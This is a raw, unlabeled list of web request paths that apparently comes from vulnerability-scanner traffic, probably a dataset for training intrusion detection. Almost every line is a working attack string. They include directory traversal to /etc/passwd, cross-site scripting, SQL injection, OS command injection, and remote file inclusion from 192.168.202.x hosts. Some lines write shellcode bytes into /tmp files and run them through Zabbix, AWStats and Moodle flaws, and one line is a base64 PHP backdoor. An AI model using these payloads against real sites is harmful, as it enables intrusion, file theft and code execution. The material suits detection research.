content=\"testexuu=5340\">\n/help.php?q='sleep\\x098\\x09#\n/include/scripts/send_email_cache.php?dir=http://192.168.202.96:8080/txenjrxf3?\n/x2gyorli.nsf?<script>document.cookie=\"testwhac=3130;\"</script>\n/scripts/cdjnwtwnqga1.cgi\n/recordings/login.pl?login=ledgersmb_script_code_exec.nasl&script=-e print \"content-type: text/plain\\x0d\\x0a\\x0d\\x0a\";system(id)&action=logout\n/6n7aacgg.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/1qwv2p5p.exe?<script>document.cookie=\"testvqcy=252;\"</script>\n/javascript/.htaccess.sfish/sfish>'>\"></sfish><sfish>\n/top.php?stuff=;sleep\\x098\\x09#\n/help.php?q=\"&rm q71917693&rem \n/_mem_bin/..\\xc1%8s..\\xc1%8s..\\xc1%8s..\\xc1%8s..\\xc1%8s../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/xsqln7eb.do?<script>document.cookie=\"testpcbb=9254;\"</script>\n/examples/jsp/num/index.php?page=documents&doc=-99' union select null,null,'nessus','dcpportal_sql.nasl',null,null,null,null,null,null,null,null--\n/3m5knyc4.x?<script>document.cookie=\"testbgqj=6434;\"</script>\n/phpmyadmin/documentation.html?phpmyadmin=map47fckapd3c2j9d7svslcjakhdm1fs'; waitfor delay '0:0:4' -- \n/main.php?logout=;uname\\x09#\n/en-us/fo564rei.idc?<script>cross_site_scripting.nasl</script>\n/cacti/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=</option></select><?phpinfo();?>\n/dda2qr7j.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/folderview.asp?folder=..\n/javascript/show.exe\n/script//ident/index.php?path_inc=http://192.168.202.118:8080/2aibfaczmac8?\n/preview.php?php_script_path=http://192.168.202.118:8080/moclyxlwqyfjnp??&cmd=dir\n/htbin/htimage.exe/path/filename?2,2\n/lmw4r201.do?<meta http-equiv=set-cookie content=\"testwews=8477\">\n/p043snfr.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/h21y8w52.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/d7ktpmcq.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=\"del\\xa0q93611953&rem\\xa0\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('chmod+777+/tmp/corqrbaqpr.sh').\"]=1\n/examples/jsp/colors/coin_includes/constants.php?_ccfg[_pkg_path_incl]=/etc/passwd\\x00\n/recordings/bb-hist.sh?histfile=../../../../../etc/passwd\n/ht8pn8uq.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cacti/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=;\n/phpmyadmin//..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/etc/passwd\n/top.php?stuff=\"|ping;-w;7000;-n;1;1.2.3.4|rem;\n/javascript/jvm.exe\n/examples/jsp/checkbox/webdist.cgi?distloc=;id\n/examples/jsp/jsp2/jspx/wordtrans.php?command=show_desc&advanced=1\";id; true \"\n//</p><body><script/src=\"http://www.example.com/test?rnd=q97851284\"></script><p>\n/ybz5rz7a.html?<meta http-equiv=set-cookie content=\"testsbvw=6289\">\n/examples/jsp/error/file.php?path=/etc/passwd\\x00\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+00+00+00+00+00+00+00+00+00+00+00+e8+32+00+00+00+6b+65+72+6e+65+6c+33+32+2e++>>esbq\n/0rufe52p.dll?<script>cross_site_scripting.nasl</script>\n/top.php?stuff='\\x0arm q13387342 #\n/javascript/shop.exe\n/examples/jsp/checkbox/cgiwrap/cgiwrap_error_page_handling_xss.nasl\n/m4kkjf8l.php3?<meta http-equiv=set-cookie content=\"testyglc=8988\">\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/bin/echo+-en+\"\\0174\\0044\\0000\\0377\\0347\"+>>+/tmp/ldlivpaolb0;').\"]=1\n/5qnlm5z2.x?<meta http-equiv=set-cookie content=\"testsixi=8451\">\n/manager/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd\\x00\n/top.php?stuff=;del q61859553 #\n/cgi-local/ion-p.exe?page=c:\\winnt\\repair\\sam\n/jujgxwav.do?<script>document.cookie=\"testknim=9383;\"</script>\n/main.php?stuff='&uname >q97413885 #\n/cgi-bin/hw3.cgi?daysonly=0).system('id').(\n/cacti/adlayer.php?layerstyle=../../../../../../../etc/passwd\\x00\n/examples/servlets/servlet/web_store/web_store.cgi?page=../../../../../../etc/passwd\\x00.html\n/p043snfr.kspx?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=';uname\\x09>q44154782\\x09#\n/cacti/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc\n/index.php?config[\"sipssys\"]=http://192.168.202.118:8080/zz5thkvtmlgl?\n/phpmyadmin/htmlscript?../../../../../../../../../etc/passwd\n/jnt3f86c.pl?<meta http-equiv=set-cookie content=\"testcmax=9270\">\n/help.php?q='sleep 10 #\n/recordings/ion-p.exe?page=c:\\\\winnt\\\\win.ini\n/scgi-bin/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd|\n/javascript/style.exe\n/jujgxwav.php3?<meta http-equiv=set-cookie content=\"testknim=9383\">\n/examples/jsp/cal/php.cgi?/etc/passwd\n/jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd\n/javascript/htpasswd.bak\n/byrg33fw.pl?<meta http-equiv=set-cookie content=\"testexuu=5340\">\n/manager/mmstdod.cgi?alternate_templates=| echo \"content-type: text/html\";echo \"\" ; id\\x00\n/help.php?q=\"&rm;q69128354&rem;\n/en-us/n9xlumt5.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/colors/store.cgi?startid=../../../../../../../../../etc/passwd\\x00.html\n/examples/jsp/checkbox/lib/authform.inc.php?path_pre=/etc/passwd\\x00\n/top.php?stuff=\";del\\x09q82281214\\x09#\n/help.php?q='\\x0arm q61886362 #\n/javascript/.htpasswd.sfish/\"`false`\"\n/javascript/banner.exe\n/mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);exec(base64_decode($_server[http_cmd]));die;#\n/?<script>document.cookie=\"testyias=101;\"</script>\n/zv8tv7h8.fts?<meta http-equiv=set-cookie content=\"testcqwz=9752\">\n/javascript/helpers.exe\n/examples/jsp/jsp2/jspx/carbo.dll?icatcommand=..\\..\\..\\..\\..\\..\\winnt\\win.ini&catalogname=catalog\n/<script>document.cookie=\"testhvje=9403;\"</script>\n/edv3mapy.html?<script>cross_site_scripting.nasl</script>\n/javascript/.htaccess/http://skipfish.invalid/;?\n/top.php?stuff=\"&del\\xa0q97411474&rem\\xa0\n/m5103snj.cgi?<script>cross_site_scripting.nasl</script>\n/6qbynt4f.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/qczkquis.htm?<meta http-equiv=set-cookie content=\"testkwlg=5591\">\n/?<meta http-equiv=set-cookie content=\"testkhwc=4028\">\n/i2n4v4rl.fts?<script>cross_site_scripting.nasl</script>\n/scripts/faq/index.php\n/module/forum/forum.php?fd=http://192.168.202.118:8080/ghl9il?=';\n/b4vng02k.cfm?<script>document.cookie=\"testtrlh=3672;\"</script>\n/examples/jsp/colors/zml.cgi?file=../../../../../../../../../../../../etc/passwd\\x00\n/raanw4ia.asp?<script>cross_site_scripting.nasl</script>\n/recordings/index.php?mod_id=2&kb_ask=</textarea><script>alert(\"cerberus_support_center_mult_flaws.nasl\")</script>\n/cfscripts/\n/cgi-bin/testcgi.exe?<script>alert(document.cookie)</script>\n/project-description/\n/help.php?q=\"ping\\x0b-w\\x0b11000\\x0b-n\\x0b1\\x0b1.2.3.4|rem\\x0b\n/xfkun1ku.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/error/logbook.pl?file=../../../../../../../../../../bin/cat /etc/passwd\\x00|\n/fnwhrxyd.cfc?<script>cross_site_scripting.nasl</script>\n/javascript/htpasswd.core\n/javascript/cd.exe\n/help.php?q=\"\\x0arm q73214822 #\n/admin/index.php/\"><script>alert(410136083331)</script><td class=\"p\n/j4oqyvga.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cacti/sawmillcl.exe?ho+{complete_version}\n/main.php?stuff=&uname\\x09>q47227688\\x09#\n/javascript/photos.exe\n/j4oqyvga.nsf?<script>cross_site_scripting.nasl</script>\n/scripts/index.php\n/ad_click.asp?banner_id='\n/manager/coin_includes/constants.php?_ccfg[_pkg_path_incl]=/etc/passwd\\x00\n/d44uk9h2.fts?<script>document.cookie=\"testmybc=2088;\"</script>\n/cgi.cgi/testcgi.exe\n/top.php?stuff=\"\\x0auname >q56276124 #\n/examples/jsp/jsp2/el/manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php?base_path=/etc/passwd\\x00\n/t578vqea.mscgi?<script>document.cookie=\"testsory=7676;\"</script>\n/<meta http-equiv=set-cookie content=\"testylik=3403\">\n/jsp-examples/jsp2/jspx/textrotate.jspx?name=<script>alert(111)</script>\n/help.php?q=\"del\\x09q83132484&rem\\x09\n/examples/jsp/sessions/k/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor\n/help.php?q=\\x0auname\\x09>q72678985\\x09#\n/top.php?stuff=\"ping -w 10000 -n 1 4.3.2.1|rem \n/javascript/peek.exe\n/scripts/udblphlq4nln.inc\n/examples/jsp/jsp2/jspx/wiki/edit.php?page=sandbox&suck_url=../kernel/config_inc.php&do_suck=h\n/confirmunsubscription.php?output=http://192.168.202.96:8080/frznctvhi0i5?\n/examples/jsp/sessions/webappmon.exe?ins=nowait&act=natping&sel=\"255.255.255.255 & id&\"\n/ows-bin/powerup/r.cgi?file=../../../../../../../../../../etc/passwd\n/forums.asp?ifor=duforum_sql_injections.nasl'\n/examples/jsp/cal/sojourn.cgi?cat=../../../../../etc/passwd\\x00\n/main.php?logout='rm\\x09q76232693\\x09#\n/en-us/33y9gcqq.kspx?<script>document.cookie=\"testnvxc=4301;\"</script>\n/d5a5renl.x?<script>cross_site_scripting.nasl</script>\n/examples/servlets/servlet/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd\\x00&bn=fm_d1\n/zeroblogxss/\n//..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c/etc/passwd\n/javascript/.htpasswd.sfish/9 - 1\n/en-us/hipkz026.x?<script>document.cookie=\"testyrbs=2855;\"</script>\n/scripts/onwkbtts3uj1.sh\n/miz4r5hz.nsf?<script>document.cookie=\"testviqu=1270;\"</script>\n/en-us/dda2qr7j.asp?<script>cross_site_scripting.nasl</script>\n/scripts/4rzefq7dsowk.cgi\n/scripts/jcart-relay.php\n/scripts/store.cgi?startid=../../../../../../../../../etc/passwd\\x00.html\n/examples/jsp/colors/index.php?search=<script>foo</script>\n/6n7aacgg.mscgi?<script>cross_site_scripting.nasl</script>\n/help.php?q=uname >q16195254 #\n/psynch/nph-psf.exe?css=http://192.168.202.118:8080/zz5thkvtmlgl?\n/scripts/6gl21a1hiz3s.inc\n/6wb70v0b.htm?<script>cross_site_scripting.nasl</script>\n/cgi-win/windmail.exe\n/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=../../../../../../../../../etc/passwd\\x00\n/examples/jsp/error/pfdispaly?../../../../../../etc/passwd\n/en-us/fo564rei.mscgi?<script>cross_site_scripting.nasl</script>\n/faq.php?action=&type=view&s=&id=-1' union select 0,333020620,0,0,0,0,0--\n/phpmyadmin/faq.php?action=&type=view&s=&id=-1' union select 0,2100957477,0,0,0,0,0--\n/cacti/faxsurvey?cat /etc/passwd\n/h21y8w52.aspx?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=\"&ping;-w;8000;-n;1;1.2.3.4&rem;\n/examples/jsp/jsp2/el/googlesearch/googlesearch.php?app[path][lib]=/etc/passwd\\x00\n/zln2hm2z.nsf?<meta http-equiv=set-cookie content=\"testblcp=8120\">\n/scripts/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1332008334,1061714587 -- \n/<meta http-equiv=set-cookie content=\"testyglc=8988\">\n/javascript/conferences.exe\n/description/\n/examples/jsp/sessions/index.pl/homels?func=add;class=webgui::asset::wobject::article;print `id`;\n/core/api.php?t_path_core=/etc/passwd\\x00\n/cgi-bin/cgiforum.pl?thesection=../../../../../../../../../../etc/passwd\\x00\n/javascript/local.exe\n/cgi-exe/pfdisplay.cgi?'\\x0a/bin/cat /etc/passwd|'\n/javascript/pub.exe\n/zmvq66jy.php3?<script>cross_site_scripting.nasl</script>\n/manager/search.cgi?..\\..\\..\\..\\..\\..\\winnt\\win.ini\n/javascript/admin.exe\n/main.php?stuff=\"|ping\\x09-w\\x098000\\x09-n\\x091\\x091.2.3.4|rem\\x09\n/j2kdmfw4.cgi?<script>cross_site_scripting.nasl</script>\n/jdx255ea.html?<meta http-equiv=set-cookie content=\"testziyq=5055\">\n/scripts/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,311692537,1573465944,1,1,1,1,1--&blogid=1\n/javascript/harmony.exe\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+5b+e8+57+00+00+00+01+d3+5e+5a+5f+58+ff+e3+e8+ed+ff+ff+ff+7f+e9+f4+09+57+69++>>esbq\n/main.php?stuff='rm\\x09q23771746\\x09#\n/examples/servlets/servlet/cgiip.exe/wservice=wsbroker1/webutil/ping.p\n/javascript/.htpasswd.sfish/http://skipfish.invalid/;?\n/aladdinghostscript/\n/cgi-bin/msmmask.exe?mask=/nessus1557947739.asp\n/en-us/jnv890lt.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ny1b3qq4.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/sc877q2pzqne.sh\n/examples/jsp/error/index.php?show=/etc/passwd\n/o1zj4u9v.cfc?<script>document.cookie=\"testabrn=6368;\"</script>\n/scripts/new-visitor.inc.php?lvc_include_dir=http://xxxxxxxx\n/javascript/digest.exe\n/network computing magazine's daily blog/\n/en-us/account/help.php?section='qualiteam_xcart_sql_xss.nasl\n/bl8sefdm.asp?<script>cross_site_scripting.nasl</script>\n/ows-bin/fileseek2.cgi?foot=;cat /etc/passwd&head=\n/servlet/cookieexample?cookiename=<script>alert(\\\"vulnerable\\\")</script>\n/help.php?q='\\x0dsleep\\x098\\x09#\nhttp://dcpmsrxpltjrsmhwrpfuoehxalsiwnuzzpearwnmxsswlvlcqjjyfpygcdzyymgbuwwneafncxlzfyobtygqmaixthfyjczycltrnwmzmiqip.com\n/tk242-qrscript_dll/\n/examples/jsp/jsp2/jspx/embed/day.php?path=/etc/passwd\\x00\n/heroes s01-e02 don't look back/\n/member/usercp_menu.php?script_folder=@rfiurl\n/demo/ms-pe02/catalog.php?cid=0&sid='\"&sortfield=title&sortorder=asc&pagenumber=1&main=http://192.168.202.96:8080/no4ghqiguzhst?&\n/scripts/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331904243,1,1681261181--\n/javascript/year.exe\n/recordings/jgs_portal_statistik.php?meinaction=themen&month=1&year=1'\n/qb2xy9aw.x?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/jspx/inc/formmail.inc.php?script_root=../templates/mail.tpl.txt\\x00\n/0u75ldxq.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/3j8echh0.php3?<script>document.cookie=\"testfuqi=4189;\"</script>\n/scripts/buoalakxhatu.sh\n/tukodz3j.cfm?<script>cross_site_scripting.nasl</script>\n/<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/javascript/fortune.exe\n/main.php?stuff='&del q14199491 #\n/cgi-bin/kernel/loadkernel.php?installpath=/etc/passwd\\x00\n/6qbynt4f.do?<script>cross_site_scripting.nasl</script>\n/b1q8bywu.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/lib/authform.inc.php?path_pre=/etc/passwd\\x00\n/scripts/includes/awol-condensed.inc.php?path=http://xxxxxxxx/\n/quagynka.cfc?<script>cross_site_scripting.nasl</script>\n/scripts/sql.php?lib_inc=1&btndrop=no&goto=/etc/passwd\n/top.php?stuff=\"rm\\x09q19771951\\x09#\n/javascript/uploader.exe\n/3m5knyc4.mscgi?<script>document.cookie=\"testbgqj=6434;\"</script>\n/javascript/incl.exe\n/examples/jsp/cal/detail.asp?nchannel='1\n/scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=dwm8o8ji9qk9fhohd\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('chmod+555+/tmp/symxvqrirx0;').\"]=1\n/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331908817')</script>\n/scripts/!pwds.txt\n/scripts/nucleus/libs/pluginadmin.php?globals[dir_libs]=/etc/passwd\\x00\n/3hlysl2x.idc?<script>document.cookie=\"testgjbe=8505;\"</script>\n/examples/jsp/num/autohtml.php?op=modload&mailfile=x&name=../../../../../../../../etc/passwd\n/scripts/wwwboard.html\n/qczkquis.exe?<script>document.cookie=\"testkwlg=5591;\"</script>\n/main.php?stuff=\"|ping -w 10000 -n 1 4.3.2.1|rem \n/zroo33l4.html?<script>document.cookie=\"testiklc=904;\"</script>\n/en-us/account/secure.php?cfgprogdir=/etc/passwd\\x00\n/javascript/server-info.exe\n/v3axg1p8.php?<script>document.cookie=\"testxagh=6987;\"</script>\n/javascript/.passwd.rss\n/help.php?q=\"ping\\x0b-w\\x0b7000\\x0b-n\\x0b1\\x0b4.3.2.1&rem\\x0b\n/iktok2bw.jspa?<script>cross_site_scripting.nasl</script>\n/index.php?search=<script>alert('cmsimple_search_xss.nasl');</script>&function=search\n/can'tfindajob/\n/top.php?stuff=ver >q77913452&rem \n/igtf0zon.jsp?<script>cross_site_scripting.nasl</script>\n/cgi-bin/cgimail.exe\n/awstats/awstats.pl?migrate=|echo;/./tmp/oyiiraofvl.sh;echo|awstats651715.txt\n/examples/jsp/security/protected/is_cgi_installed3_j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee61997061463.bak\n/phpmyadmin/sql.php3?lib_inc=1&btndrop=no&goto=/etc/passwd\n/zroo33l4.mscgi?<script>document.cookie=\"testiklc=904;\"</script>\n/i686v90l.htm?<script>document.cookie=\"testfutf=1550;\"</script>\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/./tmp/ldlivpaolb0+>+/dev/null+&').\"]=1\n/apavxugx.nsf?<script>document.cookie=\"testdnbh=5237;\"</script>\n/goboscripts/\n/examples/servlets/servlet/setcookie.php?u=../../../../../../../../../../../../etc/passwd\\x00&plugin=pblang_mult_flaws.nasl\n/examples/jsp/sessions/pfdispaly?../../../../../../etc/passwd\n/en-us/w4996nr0.nsf?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/scripts/_xuzlr7swn95.sh\n/scripts/tinfo.php?id=1331905100\n/fo564rei.exe?<script>cross_site_scripting.nasl</script>\n/rpxyx07v.html?<meta http-equiv=set-cookie content=\"testbnli=1975\">\n/javascript/htpasswd.cpp\n/clk;57254144;7163019;g/\n/javascript/tickets.exe\n/javascript/webchat.exe\n/vhzmaia2.dll?<meta http-equiv=set-cookie content=\"testkogj=3979\">\n/ovcgi/ovlaunch.exe\n//</p><body><script src=http://www.example.com/test?rnd=q11976786></script><p>\n/manager/file.cgi?name=/eventcache/../../../../../../../../../../../boot.ini\n/scripts/formmail.pl\n/examples/jsp/colors/story.pl?next=../../../../../etc/passwd\\x00\n/jnv890lt.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/xlj7h65o.pl?<meta http-equiv=set-cookie content=\"testtbbe=856\">\n/mpcgi/htimage.exe/path/filename?2,2\n/demo/ms-pe02/catalog.php?cid=0&sid='\"&sortfield=title&sortorder=asc&pagenumber=1&main=http://192.168.202.118:8080/zz5thkvtmlgl?&\n/cgi-home/sawmill?rfcf+\"sawmillinfo/sawmillpassword\"+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3\n/main.php?g2_itemid=/../../../../../../../../../../../etc/passwd\\x00\n/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://192.168.202.118:8080/ghl9il?\n/s7qus4g3.kspx?<script>cross_site_scripting.nasl</script>\n/examples/jsp/checkbox/sgdynamo.exe?htname=<script>foo</script>\n/rbec2ohx.aspx?<script>cross_site_scripting.nasl</script>\n/ybz5rz7a.htm?<script>document.cookie=\"testsbvw=6289;\"</script>\n/examples/jsp/sessions/login.php?lang=/../../../../../../../../../../../../etc/passwd\\x00\n/en-us/n9xlumt5.idc?<script>cross_site_scripting.nasl</script>\n/ows-bin/cgi-test.exe\n/scripts/index.php?id='union/**/select/**/0,0,250548738,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/index.php?string='\n/recordings/wikka.php?wakka=homepage/../../actions/wikkachanges\n/bzuf9ozq.htm?<script>cross_site_scripting.nasl</script>\n/help.php?q=\"|sleep\\x0911\\x09#\n/examples/jsp/error/cgiip.exe/wservice=wsbroker1/webutil/ping.p\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+72+65+68+45+78+69+74+54+56+ff+d7+ff+d0+00+00+00+00+00+00+00+00+00+00+00+00++>>ctdn\n/main.php?logout=&rm;q53872587&rem;\n/<meta http-equiv=set-cookie content=\"testtbjy=7334\">\n/scripts/lpzj75ztw9lb.asp\n/msadc/..\\xc0/..\\xc0/..\\xc0/..\\xc0/..\\xc0/../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/manager/search/show.pl?url=file:/etc/passwd\n/error/\\..\\..\\..\\..\\boot.ini\n/javascript/default.exe\n/en-us/account/misc/audio.php?recording=../version.inc\n/b1q8bywu.nsf?<script>cross_site_scripting.nasl</script>\n/scriptssource/\n/main.php?logout=\"&uname\\x09>q79499365\\x09#\n/script_path/config.inc.php?_path=http://192.168.202.118:8080/iroy1gvqrrqu??\n/ybz5rz7a.cgi?<script>document.cookie=\"testsbvw=6289;\"</script>\n/awstats/awstats.pl?migrate=|echo;chmod 555 /tmp/gjvtlghpjb0;echo|awstats852493.txt\n/recordings/spaw/dialogs/confirm.php?spaw_root=/etc/passwd\\x00\n/7o5qp766.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/n9xlumt5.idc?<script>cross_site_scripting.nasl</script>\n/interface/login/validateuser.php?u='\n/cgi-bin/fileseek.cgi?foot=&head=;cat /etc/passwd|\n/examples/servlets/servlet/detail.asp?nchannel='1\n/ju0u7kfo.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/account/webplus?script=/../../../../etc/passwd\n/main.php?logout=';uname\\x09>q35732238\\x09#\n/recordings/scp.dll/sendto?template=../../../../../../../../../../../../boot.ini\\x00gwextranet_template_dir_traversal.nasl\n/index.php?c=access&a=login&ref_c=nessus\"><script>alert(870759753)</script>&ref_a=projectpier_login_page_xss.nasl\"><script>alert(1327853153)</script>\n/top.php?stuff=\"&ping;-w;11000;-n;1;1.2.3.4&rem;\n/examples/jsp/security/protected/is_cgi_installed3_j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee61712365427.copy\n<script>document.cookie=\"testqppc=8767;\"</script>\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=q76186746&frm_user=&scr_height=&scr_width=\n/examples/jsp/cal/nph-mr.cgi?do=loginhelp&configlanguage=../../../../../../../etc/passwd\\x00\n/main.php?stuff=';del q39366727 #\n/recordings/index.php?id=h6xj4vcok1'\n/examples/jsp/checkbox/pjreview_neo.cgi?p=../../../../../../../../../../etc/passwd\n/x7pclv4s.mscgi?<meta http-equiv=set-cookie content=\"testiulz=3709\">\n/help.php?q=\"|ping\\x0b-w\\x0b7000\\x0b-n\\x0b1\\x0b1.2.3.4|rem\\x0b\n/examples/jsp/colors/config.php?returnpath=/etc/passwd\\x00\n/document.secin.password.value\n/subscriptions.rb\n/examples/jsp/sessions/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904405')</script>\n/javascript/checkout.exe\n/main.php?logout=\"ping\\x0c-w\\x0c10000\\x0c-n\\x0c1\\x0c1.2.3.4|rem\\x0c\n/gy23xnjq.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/um7xpn15.pl?<script>document.cookie=\"testotoy=6142;\"</script>\n/hipkz026.nsf?<script>document.cookie=\"testyrbs=2855;\"</script>\n/cacti/htsearch?exclude=`/etc/passwd`\n/manager/pmwiki.php?globals[farmd]=/etc/passwd\\x00\n/manager/index.php?_language=../../../../../../../../../../etc/passwd\\x00\n/javascript/encrypted.exe\n<script>document.cookie=\"testmjct=1867;\"</script>\n/ghswfouu.htm?<script>document.cookie=\"testsqmm=5713;\"</script>\n/l4fz1dqw.htm?<script>cross_site_scripting.nasl</script>\n/vmi8bb12.cfc?<script>document.cookie=\"testlerc=2575;\"</script>\n/index.php?news7[\"functions\"]=http://192.168.202.118:8080/2aibfaczmac8?\n/examples/jsp/checkbox/starnet/modules/sn_allbum/slideshow.php?cmsdir=/etc/passwd\\x00\n/?<script>document.cookie=\"testyglc=8988;\"</script>\n/javascript/req.exe\n/en-us/hipkz026.jsp?<script>document.cookie=\"testyrbs=2855;\"</script>\n/manager/wiki.php/<script>foo</script>\n/top.php?stuff=;del q32339198 #\n/htbin/ion-p?page=../../../../../etc/passwd\n/javascript/webcgi.exe\n/ybz5rz7a.nsf?<script>document.cookie=\"testsbvw=6289;\"</script>\n/xmlforscript/\n/printsubscriptionscm/\n/<meta http-equiv=set-cookie content=\"testyias=101\">\n/scripts/install.php?newlang=../../cpg_error.log\\x00\n/gy23xnjq.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/suites.exe\n/help.php?q=\"ver,>q35488415&rem,\n/top.php?stuff=&ver\\x0b>q87811991&rem\\x0b\n/main.php?stuff=\"&rm\\x0cq69516617&rem\\x0c\n/if69ddo1.jsp?<script>document.cookie=\"testiabz=5220;\"</script>\n/main.php?stuff='sleep 10 #\n/main.php?logout=\"&ping\\xa0-w\\xa010000\\xa0-n\\xa01\\xa01.2.3.4&rem\\xa0\n/cgi-bin/index.php?op=default&date=200607' union select 1,1547116710,1,1,1,1,1,1,1,1--&blogid=1\n/scripts/shop.plx/page=nessus1262181160\n/3m5knyc4.dll?<meta http-equiv=set-cookie content=\"testbgqj=6434\">\n/javascript/edits.exe\n/main.php?stuff=\"ping\\x0b-w\\x0b7000\\x0b-n\\x0b1\\x0b1.2.3.4|rem\\x0b\n/examples/jsp/sessions/main.php?g2_itemid=../../../../../license\\x00\n/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=http://192.168.202.96:8080/txenjrxf3??\n/ewc3rz1l.cgi?<script>document.cookie=\"testkgqo=204;\"</script>\n/data/fetch.php?page='\n/cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/cfm/upload.cfm?command=fileupload&type=file&currentfolder=/z.jsp\\x00\n/scripts/index.php?op=default&date=200607' union select 1,559960955,1,1,1,1,1,1,1,1--&blogid=1\n/h21y8w52.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/miz4r5hz.exe?<script>document.cookie=\"testviqu=1270;\"</script>\n/examples/jsp/sessions/topic.php?tid='select\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+c3+08+53+51+83+c3+08+53+51+8b+dc+83+c3+08+ff+d7+81+ec+90+01+00+00+54+68+01++>>esbq\n/javascript/passive.exe\n/scripts/pfdispaly?../../../../../../etc/passwd\n/recordings/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331918993',null,null,null,null --\n/manual/de/programs/htpasswd.html\n/en-us/9kr0ih0v.mscgi?<script>document.cookie=\"testzgnm=1183;\"</script>\n/examples/jsp/error/source?v=../../../../../../../../../../etc/passwd\\x00\n/cgi-bin/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1332010400,256728797 -- \n/help.php?q=\"&del\\xa0q93363383&rem\\xa0\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"\\0367\\0322\\0041\\03201\\0311qqj\\0042j\\0007pq\\0211\\0343\" >> /tmp/qcywjpzuja0;echo|awstats902207.txt\n/j2kdmfw4.kspx?<script>cross_site_scripting.nasl</script>\n/jnv890lt.cfc?<script>cross_site_scripting.nasl</script>\n/gvx7m5ti.nsf?<meta http-equiv=set-cookie content=\"testwldz=3506\">\n/top.php?stuff=\"&rm q38114689 #\n/q703m78q.asp?<script>document.cookie=\"testvowq=604;\"</script>\n/l4fz1dqw.html?<script>cross_site_scripting.nasl</script>\n/yver8r9o.asp?<script>cross_site_scripting.nasl</script>\n/manager/sendcard.php?view=1&id='sendcard_sql.nasl\n/cacti/jgs_portal_statistik.php?meinaction=themen&month=1&year=1'\n/logon?onok=\"><script>alert('axon_logon_xss.nasl')</script>\n/en-us/h5sc3gxy.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/cfm/upload.cfm?command=fileupload&type=file&currentfolder=/szlppmq.jsp\\x00\n/recordings/mailbox.php3?actionid=6&server=x&imapuser=x';somesql&pass=x\n/recordings/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331918999\n/men's only room 